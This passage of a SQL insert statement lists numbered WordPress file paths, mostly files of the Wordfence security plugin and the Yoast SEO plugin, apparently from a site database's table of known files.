,(1573,'wp-content/plugins/wordfence/views/scanner/options-group-general.php'),(1574,'wp-content/plugins/wordfence/views/scanner/options-group-performance.php'),(1575,'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php'),(1576,'wp-content/plugins/wordfence/views/scanner/scan-failed.php'),(1577,'wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php'),(1578,'wp-content/plugins/wordfence/views/scanner/scan-progress-element.php'),(1579,'wp-content/plugins/wordfence/views/scanner/scan-progress.php'),(1580,'wp-content/plugins/wordfence/views/scanner/scan-results.php'),(1581,'wp-content/plugins/wordfence/views/scanner/scan-scheduling.php'),(1582,'wp-content/plugins/wordfence/views/scanner/scan-starter.php'),(1583,'wp-content/plugins/wordfence/views/scanner/scan-type.php'),(1584,'wp-content/plugins/wordfence/views/scanner/scanner-status.php'),(1585,'wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php'),(1586,'wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php'),(1587,'wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php'),(1588,'wp-content/plugins/wordfence/views/scanner/site-cleaning.php'),(1589,'wp-content/plugins/wordfence/views/tools/options-group-2fa.php'),(1590,'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php'),(1591,'wp-content/plugins/wordfence/views/tours/login-security.php'),(1592,'wp-content/plugins/wordfence/views/unsupported-php/admin-message.php'),(1593,'wp-content/plugins/wordfence/views/user/disabled-application-passwords.php'),(1594,'wp-content/plugins/wordfence/views/waf/debug.php'),(1595,'wp-content/plugins/wordfence/views/waf/firewall-status.php'),(1596,'wp-content/plugins/wordfence/views/waf/option-rate-limit.php'),(1597,'wp-content/plugins/wordfence/views/waf/option-rules.php'),(1598,'wp-content/plugins/wordfence/views/waf/option-whitelist.php'),(1599,'wp-content/plugins/wordfence/views/waf/options-group-advanced-firewall.php'),(1600,'wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php'),(1601,'wp-content/plugins/wordfence/views/waf/options-group-brute-force.php'),(1602,'wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php'),(1603,'wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php'),(1604,'wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php'),(1605,'wp-content/plugins/wordfence/views/waf/waf-install-manual.php'),(1606,'wp-content/plugins/wordfence/views/waf/waf-install-success.php'),(1607,'wp-content/plugins/wordfence/views/waf/waf-install.php'),(1608,'wp-content/plugins/wordfence/views/waf/waf-modal-wrapper.php'),(1609,'wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php'),(1610,'wp-content/plugins/wordfence/views/waf/waf-uninstall.php'),(1611,'wp-content/plugins/wordfence/waf/.htaccess'),(1612,'wp-content/plugins/wordfence/waf/bootstrap.php'),(1613,'wp-content/plugins/wordfence/waf/pomo/entry.php'),(1614,'wp-content/plugins/wordfence/waf/pomo/mo.php'),(1615,'wp-content/plugins/wordfence/waf/pomo/plural-forms.php'),(1616,'wp-content/plugins/wordfence/waf/pomo/po.php'),(1617,'wp-content/plugins/wordfence/waf/pomo/streams.php'),(1618,'wp-content/plugins/wordfence/waf/pomo/translations.php'),(1619,'wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php'),(1620,'wp-content/plugins/wordfence/waf/wfWAFIPBlocksController.php'),(1621,'wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php'),(1622,'wp-content/plugins/wordfence/wordfence.php'),(1623,'wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php'),(1624,'wp-content/plugins/wordpress-seo/admin/ajax/class-shortcode-filter.php'),(1625,'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php'),(1626,'wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-plugin-conflict-ajax.php'),(1627,'wp-content/plugins/wordpress-seo/admin/ajax.php'),(1628,'wp-content/plugins/wordpress-seo/admin/capabilities/class-abstract-capability-manager.php'),(1629,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-factory.php'),(1630,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-integration.php'),(1631,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php'),(1632,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-wp.php'),(1633,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager.php'),(1634,'wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php'),(1635,'wp-content/plugins/wordpress-seo/admin/capabilities/class-register-capabilities.php'),(1636,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-analysis-worker-location.php'),(1637,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-dev-server-location.php'),(1638,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-location.php'),(1639,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-manager.php'),(1640,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-seo-location.php'),(1641,'wp-content/plugins/wordpress-seo/admin/class-admin-asset-yoast-components-l10n.php'),(1642,'wp-content/plugins/wordpress-seo/admin/class-admin-editor-specific-replace-vars.php'),(1643,'wp-content/plugins/wordpress-seo/admin/class-admin-gutenberg-compatibility-notification.php'),(1644,'wp-content/plugins/wordpress-seo/admin/class-admin-help-panel.php'),(1645,'wp-content/plugins/wordpress-seo/admin/class-admin-init.php'),(1646,'wp-content/plugins/wordpress-seo/admin/class-admin-recommended-replace-vars.php'),(1647,'wp-content/plugins/wordpress-seo/admin/class-admin-user-profile.php'),(1648,'wp-content/plugins/wordpress-seo/admin/class-admin-utils.php'),(1649,'wp-content/plugins/wordpress-seo/admin/class-admin.php'),(1650,'wp-content/plugins/wordpress-seo/admin/class-asset.php'),(1651,'wp-content/plugins/wordpress-seo/admin/class-bulk-description-editor-list-table.php'),(1652,'wp-content/plugins/wordpress-seo/admin/class-bulk-editor-list-table.php'),(1653,'wp-content/plugins/wordpress-seo/admin/class-bulk-title-editor-list-table.php'),(1654,'wp-content/plugins/wordpress-seo/admin/class-collector.php'),(1655,'wp-content/plugins/wordpress-seo/admin/class-config.php'),(1656,'wp-content/plugins/wordpress-seo/admin/class-customizer.php'),(1657,'wp-content/plugins/wordpress-seo/admin/class-database-proxy.php'),(1658,'wp-content/plugins/wordpress-seo/admin/class-export.php'),(1659,'wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php'),(1660,'wp-content/plugins/wordpress-seo/admin/class-gutenberg-compatibility.php'),(1661,'wp-content/plugins/wordpress-seo/admin/class-helpscout.php'),(1662,'wp-content/plugins/wordpress-seo/admin/class-meta-columns.php'),(1663,'wp-content/plugins/wordpress-seo/admin/class-my-yoast-proxy.php'),(1664,'wp-content/plugins/wordpress-seo/admin/class-option-tab.php'),(1665,'wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php'),(1666,'wp-content/plugins/wordpress-seo/admin/class-option-tabs.php'),(1667,'wp-content/plugins/wordpress-seo/admin/class-paper-presenter.php'),(1668,'wp-content/plugins/wordpress-seo/admin/class-plugin-availability.php'),(1669,'wp-content/plugins/wordpress-seo/admin/class-plugin-conflict.php'),(1670,'wp-content/plugins/wordpress-seo/admin/class-premium-popup.php'),(1671,'wp-content/plugins/wordpress-seo/admin/class-premium-upsell-admin-block.php'),(1672,'wp-content/plugins/wordpress-seo/admin/class-primary-term-admin.php'),(1673,'wp-content/plugins/wordpress-seo/admin/class-product-upsell-notice.php'),(1674,'wp-content/plugins/wordpress-seo/admin/class-remote-request.php'),(1675,'wp-content/plugins/wordpress-seo/admin/class-schema-person-upgrade-notification.php'),(1676,'wp-content/plugins/wordpress-seo/admin/class-suggested-plugins.php'),(1677,'wp-content/plugins/wordpress-seo/admin/class-yoast-columns.php'),(1678,'wp-content/plugins/wordpress-seo/admin/class-yoast-dashboard-widget.php'),(1679,'wp-content/plugins/wordpress-seo/admin/class-yoast-form.php'),(1680,'wp-content/plugins/wordpress-seo/admin/class-yoast-input-validation.php'),(1681,'wp-content/plugins/wordpress-seo/admin/class-yoast-network-admin.php'),(1682,'wp-content/plugins/wordpress-seo/admin/class-yoast-network-settings-api.php'),(1683,'wp-content/plugins/wordpress-seo/admin/class-yoast-notification-center.php'),(1684,'wp-content/plugins/wordpress-seo/admin/class-yoast-notification.php'),(1685,'wp-content/plugins/wordpress-seo/admin/class-yoast-notifications.php'),(1686,'wp-content/plugins/wordpress-seo/admin/class-yoast-plugin-conflict.php'),(1687,'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-file-size.php'),(1688,'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint-statistics.php'),(1689,'wp-content/plugins/wordpress-seo/admin/endpoints/class-endpoint.php'),(1690,'wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php'),(1691,'wp-content/plugins/wordpress-seo/admin/filters/class-abstract-post-filter.php'),(1692,'wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php'),(1693,'wp-content/plugins/wordpress-seo/admin/formatter/class-metabox-formatter.php'),(1694,'wp-content/plugins/wordpress-seo/admin/formatter/class-post-metabox-formatter.php'),(1695,'wp-content/plugins/wordpress-seo/admin/formatter/class-term-metabox-formatter.php'),(1696,'wp-content/plugins/wordpress-seo/admin/formatter/interface-metabox-formatter.php'),(1697,'wp-content/plugins/wordpress-seo/admin/google_search_console/class-gsc.php'),(1698,'wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-display.php'),(1699,'wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-redirect-nopremium.php'),(1700,'wp-content/plugins/wordpress-seo/admin/import/class-import-detector.php'),(1701,'wp-content/plugins/wordpress-seo/admin/import/class-import-plugin.php'),(1702,'wp-content/plugins/wordpress-seo/admin/import/class-import-settings.php'),(1703,'wp-content/plugins/wordpress-seo/admin/import/class-import-status.php'),(1704,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-abstract-plugin-importer.php'),(1705,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo-v4.php'),(1706,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo.php'),(1707,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php'),(1708,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-headspace.php'),(1709,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-jetpack.php'),(1710,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-platinum-seo-pack.php'),(1711,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-premium-seo-pack.php'),(1712,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-rankmath.php'),(1713,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seo-framework.php'),(1714,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php'),(1715,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-smartcrawl.php'),(1716,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php'),(1717,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-ultimate-seo.php'),(1718,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-woothemes-seo.php'),(1719,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wp-meta-seo.php'),(1720,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wpseo.php'),(1721,'wp-content/plugins/wordpress-seo/admin/import/plugins/class-importers.php'),(1722,'wp-content/plugins/wordpress-seo/admin/index.php'),(1723,'wp-content/plugins/wordpress-seo/admin/interface-collection.php'),(1724,'wp-content/plugins/wordpress-seo/admin/interface-installable.php'),(1725,'wp-content/plugins/wordpress-seo/admin/listeners/class-listener.php'),(1726,'wp-content/plugins/wordpress-seo/admin/menu/class-admin-menu.php'),(1727,'wp-content/plugins/wordpress-seo/admin/menu/class-base-menu.php'),(1728,'wp-content/plugins/wordpress-seo/admin/menu/class-menu.php'),(1729,'wp-content/plugins/wordpress-seo/admin/menu/class-network-admin-menu.php'),(1730,'wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-editor.php'),(1731,'wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-field.php'),(1732,'wp-content/plugins/wordpress-seo/admin/menu/class-submenu-capability-normalize.php'),(1733,'wp-content/plugins/wordpress-seo/admin/metabox/class-abstract-sectioned-metabox-tab.php'),(1734,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-readability.php'),(1735,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php'),(1736,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsible.php'),(1737,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsibles-section.php'),(1738,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php'),(1739,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-form-tab.php'),(1740,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php'),(1741,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-additional.php'),(1742,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-react.php'),(1743,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-readability.php'),(1744,'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox.php'),(1745,'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-analysis.php'),(1746,'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-section.php'),(1747,'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-tab.php'),(1748,'wp-content/plugins/wordpress-seo/admin/notifiers/dismissible-notification.php'),(1749,'wp-content/plugins/wordpress-seo/admin/notifiers/interface-notification-handler.php'),(1750,'wp-content/plugins/wordpress-seo/admin/pages/dashboard.php'),(1751,'wp-content/plugins/wordpress-seo/admin/pages/licenses.php'),(1752,'wp-content/plugins/wordpress-seo/admin/pages/metas.php'),(1753,'wp-content/plugins/wordpress-seo/admin/pages/network.php'),(1754,'wp-content/plugins/wordpress-seo/admin/pages/social.php'),(1755,'wp-content/plugins/wordpress-seo/admin/pages/tools.php'),(1756,'wp-content/plugins/wordpress-seo/admin/roles/class-abstract-role-manager.php'),(1757,'wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php'),(1758,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php'),(1759,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-vip.php'),(1760,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-wp.php'),(1761,'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager.php'),(1762,'wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-option.php'),(1763,'wp-content/plugins/wordpress-seo/admin/ryte/class-ryte-request.php'),(1764,'wp-content/plugins/wordpress-seo/admin/services/class-file-size.php'),(1765,'wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-integration.php'),(1766,'wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-service.php'),(1767,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-columns.php'),(1768,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields-presenter.php'),(1769,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php'),(1770,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php'),(1771,'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php'),(1772,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-default-data.php'),(1773,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-plugin-data.php'),(1774,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-server-data.php'),(1775,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php'),(1776,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-theme-data.php'),(1777,'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking.php'),(1778,'wp-content/plugins/wordpress-seo/admin/views/class-view-utils.php'),(1779,'wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggle.php'),(1780,'wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggles.php'),(1781,'wp-content/plugins/wordpress-seo/admin/views/class-yoast-input-select.php'),(1782,'wp-content/plugins/wordpress-seo/admin/views/class-yoast-integration-toggles.php'),(1783,'wp-content/plugins/wordpress-seo/admin/views/form/select.php'),(1784,'wp-content/plugins/wordpress-seo/admin/views/interface-yoast-form-element.php'),(1785,'wp-content/plugins/wordpress-seo/admin/views/js-templates-primary-term.php'),(1786,'wp-content/plugins/wordpress-seo/admin/views/licenses.php'),(1787,'wp-content/plugins/wordpress-seo/admin/views/paper-collapsible.php'),(1788,'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-errors.php'),(1789,'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-template.php'),(1790,'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-warnings.php'),(1791,'wp-content/plugins/wordpress-seo/admin/views/sidebar.php'),(1792,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php'),(1793,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/features.php'),(1794,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/integrations.php'),(1795,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/site-analysis.php'),(1796,'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/webmaster-tools.php'),(1797,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives/help.php'),(1798,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives.php'),(1799,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/breadcrumbs.php'),(1800,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/general.php'),(1801,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/media.php'),(1802,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/author-archive-settings.php'),(1803,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/breadcrumbs-content.php'),(1804,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/date-archives-settings.php'),(1805,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/front-page-content.php'),(1806,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/force-rewrite-title.php'),(1807,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/homepage.php'),(1808,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/knowledge-graph.php'),(1809,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/title-separator.php'),(1810,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/integrations/wincher.php'),(1811,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/media-content.php'),(1812,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post-type-content.php'),(1813,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/post-type.php'),(1814,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post_type/woocommerce-shop-page.php'),(1815,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/rss-content.php'),(1816,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/special-pages.php'),(1817,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/taxonomy-content.php'),(1818,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/post-types.php'),(1819,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/rss.php'),(1820,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies/category-url.php'),(1821,'wp-content/plugins/wordpress-seo/admin/views/tabs/metas/taxonomies.php'),(1822,'wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php'),(1823,'wp-content/plugins/wordpress-seo/admin/views/tabs/network/general.php'),(1824,'wp-content/plugins/wordpress-seo/admin/views/tabs/network/integrations.php'),(1825,'wp-content/plugins/wordpress-seo/admin/views/tabs/network/restore-site.php'),(1826,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/accounts.php'),(1827,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/facebook.php'),(1828,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/pinterest.php'),(1829,'wp-content/plugins/wordpress-seo/admin/views/tabs/social/twitterbox.php'),(1830,'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/import-seo.php'),(1831,'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-export.php'),(1832,'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-import.php'),(1833,'wp-content/plugins/wordpress-seo/admin/views/tool-bulk-editor.php'),(1834,'wp-content/plugins/wordpress-seo/admin/views/tool-file-editor.php'),(1835,'wp-content/plugins/wordpress-seo/admin/views/tool-import-export.php'),(1836,'wp-content/plugins/wordpress-seo/admin/views/user-profile.php'),(1837,'wp-content/plugins/wordpress-seo/admin/watchers/class-slug-change-watcher.php'),(1838,'wp-content/plugins/wordpress-seo/css/dist/admin-global-1851-rtl.css'),(1839,'wp-content/plugins/wordpress-seo/css/dist/admin-global-1851.css'),(1840,'wp-content/plugins/wordpress-seo/css/dist/adminbar-1851-rtl.css'),(1841,'wp-content/plugins/wordpress-seo/css/dist/adminbar-1851.css'),(1842,'wp-content/plugins/wordpress-seo/css/dist/alerts-1851-rtl.css'),(1843,'wp-content/plugins/wordpress-seo/css/dist/alerts-1851.css'),(1844,'wp-content/plugins/wordpress-seo/css/dist/dashboard-1851-rtl.css'),(1845,'wp-content/plugins/wordpress-seo/css/dist/dashboard-1851.css'),(1846,'wp-content/plugins/wordpress-seo/css/dist/edit-page-1851-rtl.css'),(1847,'wp-content/plugins/wordpress-seo/css/dist/edit-page-1851.css'),(1848,'wp-content/plugins/wordpress-seo/css/dist/elementor-1851-rtl.css'),(1849,'wp-content/plugins/wordpress-seo/css/dist/elementor-1851.css'),(1850,'wp-content/plugins/wordpress-seo/css/dist/featured-image-1851-rtl.css'),(1851,'wp-content/plugins/wordpress-seo/css/dist/featured-image-1851.css'),(1852,'wp-content/plugins/wordpress-seo/css/dist/filter-explanation-1851-rtl.css'),(1853,'wp-content/plugins/wordpress-seo/css/dist/filter-explanation-1851.css'),(1854,'wp-content/plugins/wordpress-seo/css/dist/icons-1851-rtl.css'),(1855,'wp-content/plugins/wordpress-seo/css/dist/icons-1851.css'),(1856,'wp-content/plugins/wordpress-seo/css/dist/inside-editor-1851-rtl.css'),(1857,'wp-content/plugins/wordpress-seo/css/dist/inside-editor-1851.css'),(1858,'wp-content/plugins/wordpress-seo/css/dist/installation-success-1851-rtl.css'),(1859,'wp-content/plugins/wordpress-seo/css/dist/installation-success-1851.css'),(1860,'wp-content/plugins/wordpress-seo/css/dist/metabox-1851-rtl.css'),(1861,'wp-content/plugins/wordpress-seo/css/dist/metabox-1851.css'),(1862,'wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-1851-rtl.css'),(1863,'wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-1851.css'),(1864,'wp-content/plugins/wordpress-seo/css/dist/modal-1851-rtl.css'),(1865,'wp-content/plugins/wordpress-seo/css/dist/modal-1851.css'),(1866,'wp-content/plugins/wordpress-seo/css/dist/monorepo-1851-rtl.css'),(1867,'wp-content/plugins/wordpress-seo/css/dist/monorepo-1851.css'),(1868,'wp-content/plugins/wordpress-seo/css/dist/notifications-1851-rtl.css'),(1869,'wp-content/plugins/wordpress-seo/css/dist/notifications-1851.css'),(1870,'wp-content/plugins/wordpress-seo/css/dist/schema-blocks-1851-rtl.css'),(1871,'wp-content/plugins/wordpress-seo/css/dist/schema-blocks-1851.css'),(1872,'wp-content/plugins/wordpress-seo/css/dist/score_icon-1851-rtl.css'),(1873,'wp-content/plugins/wordpress-seo/css/dist/score_icon-1851.css'),(1874,'wp-content/plugins/wordpress-seo/css/dist/search-appearance-1851-rtl.css'),(1875,'wp-content/plugins/wordpress-seo/css/dist/search-appearance-1851.css'),(1876,'wp-content/plugins/wordpress-seo/css/dist/select2/select2-rtl.css'),(1877,'wp-content/plugins/wordpress-seo/css/dist/select2/select2.min.css'),(1878,'wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-1851-rtl.css'),(1879,'wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-1851.css'),(1880,'wp-content/plugins/wordpress-seo/css/dist/toggle-switch-1851-rtl.css'),(1881,'wp-content/plugins/wordpress-seo/css/dist/toggle-switch-1851.css'),(1882,'wp-content/plugins/wordpress-seo/css/dist/tooltips-1851-rtl.css'),(1883,'wp-content/plugins/wordpress-seo/css/dist/tooltips-1851.css'),(1884,'wp-content/plugins/wordpress-seo/css/dist/workouts-1851-rtl.css'),(1885,'wp-content/plugins/wordpress-seo/css/dist/workouts-1851.css'),(1886,'wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-1851-rtl.css'),(1887,'wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-1851.css'),(1888,'wp-content/plugins/wordpress-seo/css/dist/yoast-components-1851-rtl.css'),(1889,'wp-content/plugins/wordpress-seo/css/dist/yoast-components-1851.css'),(1890,'wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-1851-rtl.css'),(1891,'wp-content/plugins/wordpress-seo/css/dist/yoast-extensions-1851.css'),(1892,'wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-1851-rtl.css'),(1893,'wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-1851.css'),(1894,'wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-1851-rtl.css'),(1895,'wp-content/plugins/wordpress-seo/css/dist/yst_seo_score-1851.css'),(1896,'wp-content/plugins/wordpress-seo/css/main-sitemap.xsl'),(1897,'wp-content/plugins/wordpress-seo/images/Assistent_Time_bubble_500x570.png'),(1898,'wp-content/plugins/wordpress-seo/images/Yoast_SEO_negative_icon.svg'),(1899,'wp-content/plugins/wordpress-seo/images/alert-error-icon.svg'),(1900,'wp-content/plugins/wordpress-seo/images/alert-info-icon.svg'),(1901,'wp-content/plugins/wordpress-seo/images/alert-success-icon.svg'),(1902,'wp-content/plugins/wordpress-seo/images/alert-warning-icon.svg'),(1903,'wp-content/plugins/wordpress-seo/images/brushstroke_background.svg'),(1904,'wp-content/plugins/wordpress-seo/images/error-icon.svg'),(1905,'wp-content/plugins/wordpress-seo/images/index.php'),(1906,'wp-content/plugins/wordpress-seo/images/link-in-icon.svg'),(1907,'wp-content/plugins/wordpress-seo/images/link-out-icon.svg'),(1908,'wp-content/plugins/wordpress-seo/images/local_plugin_assistant.svg'),(1909,'wp-content/plugins/wordpress-seo/images/man_with_tablet.png'),(1910,'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_man_1_optim.svg'),(1911,'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_1_optim.svg'),(1912,'wp-content/plugins/wordpress-seo/images/mirrored_fit_bubble_woman_2_optim.svg'),(1913,'wp-content/plugins/wordpress-seo/images/new-to-configuration-notice.svg'),(1914,'wp-content/plugins/wordpress-seo/images/news_plugin_assistant.svg'),(1915,'wp-content/plugins/wordpress-seo/images/profile-social-fields.png'),(1916,'wp-content/plugins/wordpress-seo/images/question-mark.png'),(1917,'wp-content/plugins/wordpress-seo/images/readability-icon.svg'),(1918,'wp-content/plugins/wordpress-seo/images/stale-cornerstone-content-in-yoast-seo.png'),(1919,'wp-content/plugins/wordpress-seo/images/support-team.svg'),(1920,'wp-content/plugins/wordpress-seo/images/video_plugin_assistant.svg'),(1921,'wp-content/plugins/wordpress-seo/images/woo_plugin_assistant.svg'),(1922,'wp-content/plugins/wordpress-seo/inc/class-addon-manager.php'),(1923,'wp-content/plugins/wordpress-seo/inc/class-my-yoast-api-request.php'),(1924,'wp-content/plugins/wordpress-seo/inc/class-post-type.php'),(1925,'wp-content/plugins/wordpress-seo/inc/class-rewrite.php'),(1926,'wp-content/plugins/wordpress-seo/inc/class-upgrade-history.php'),(1927,'wp-content/plugins/wordpress-seo/inc/class-upgrade.php'),(1928,'wp-content/plugins/wordpress-seo/inc/class-wpseo-admin-bar-menu.php'),(1929,'wp-content/plugins/wordpress-seo/inc/class-wpseo-content-images.php'),(1930,'wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-fields.php'),(1931,'wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php'),(1932,'wp-content/plugins/wordpress-seo/inc/class-wpseo-features.php'),(1933,'wp-content/plugins/wordpress-seo/inc/class-wpseo-image-utils.php'),(1934,'wp-content/plugins/wordpress-seo/inc/class-wpseo-installation.php'),(1935,'wp-content/plugins/wordpress-seo/inc/class-wpseo-meta.php'),(1936,'wp-content/plugins/wordpress-seo/inc/class-wpseo-primary-term.php'),(1937,'wp-content/plugins/wordpress-seo/inc/class-wpseo-rank.php'),(1938,'wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php'),(1939,'wp-content/plugins/wordpress-seo/inc/class-wpseo-replacement-variable.php'),(1940,'wp-content/plugins/wordpress-seo/inc/class-wpseo-shortlinker.php'),(1941,'wp-content/plugins/wordpress-seo/inc/class-wpseo-statistics.php'),(1942,'wp-content/plugins/wordpress-seo/inc/class-wpseo-utils.php'),(1943,'wp-content/plugins/wordpress-seo/inc/date-helper.php'),(1944,'wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-bad-request-exception.php'),(1945,'wp-content/plugins/wordpress-seo/inc/exceptions/class-myyoast-invalid-json-exception.php'),(1946,'wp-content/plugins/wordpress-seo/inc/index.php'),(1947,'wp-content/plugins/wordpress-seo/inc/interface-wpseo-wordpress-a